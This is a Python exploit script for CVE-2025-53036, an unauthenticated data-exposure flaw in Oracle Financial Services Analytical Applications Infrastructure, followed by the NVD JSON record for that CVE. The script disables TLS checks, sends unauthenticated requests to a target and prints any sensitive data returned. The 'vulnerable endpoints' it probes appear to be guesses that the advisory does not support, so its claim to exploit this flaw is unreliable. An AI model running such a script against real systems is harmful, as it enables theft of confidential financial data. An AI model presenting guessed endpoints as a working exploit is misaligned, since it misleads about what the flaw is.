CVE-2025-53036

# CVE-2025-53036 - Oracle Financial Services Analytical Applications Infrastructure # Platform Component Unauthorized Access Vulnerability # CVSS 3.1: 8.6 (HIGH) - C:H/I:N/A:N # Affected versions: 8.0.7.9, 8.0.8.7, 8.1.2.5 import requests import sys TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "https://target-oracle-fsaai.example.com" # Exploit: Unauthenticated HTTP request to access sensitive data # via the vulnerable Platform component endpoint HEADERS = { "User-Agent": "Mozilla/5.0 (compatible; SecurityResearch/1.0)", "Accept": "application/json, text/plain, */*", "Connection": "close" } def exploit(target_url): """ Attempt to access sensitive data through the vulnerable Oracle Financial Services Analytical Applications Infrastructure Platform component without authentication. """ # Common vulnerable endpoints in Oracle FSAAI Platform component endpoints = [ "/analytics-platform/api/v1/system/config", "/ofsaa-platform/rest/api/admin/data", "/platform/sensitive/data/export", "/ofsaa/fccm/api/platform/users", "/platform/api/internal/configuration" ] for endpoint in endpoints: url = f"{target_url.rstrip('/')}{endpoint}" try: # Send unauthenticated request (PR:N - no privileges required) response = requests.get(url, headers=HEADERS, timeout=10, verify=False) if response.status_code == 200: print(f"[+] Potential data exposure at: {url}") print(f"[+] Response: {response.text[:500]}") return True elif response.status_code == 403: print(f"[-] Access denied (patched?): {url}") else: print(f"[?] Status {response.status_code}: {url}") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to {url}: {e}") return False if __name__ == "__main__": print(f"[*] Targeting: {TARGET_URL}") print("[*] CVE-2025-53036 - Oracle FSAAI Platform Unauthorized Access") exploit(TARGET_URL)

{"cve": {"id": "CVE-2025-53036", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:40.803", "lastModified": "2025-10-23T16:08:47.680", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle Financial Services Analytical Applications Infrastructure product of Oracle Financial Services Applications (component: Platform). Supported versions that are affected are 8.0.7.9, 8.0.8.7 and 8.1.2.5. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. While the vulnerability is in Oracle Financial Services Analytical Applications Infrastructure, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Financial Services Analytical Applications Infrastructure accessible data. CVSS 3.1 Base Score 8.6 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.7.9.0:*:*:*:*:*:*:*", "matchCriteriaId": "01413F8D-9A00-4D47-AEFC-B214F24DF7E6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.8.7.0:*:*:*:*:*:*:*", "matchCriteriaId": "99758374-009C-4AD2-8402-F8F0ACE6B289"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.1.2.5.0:*:*:*:*:*:*:*", "matchCriteriaId": "93333ABD-DCF3-46E6-8053-36B62D7431A3"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}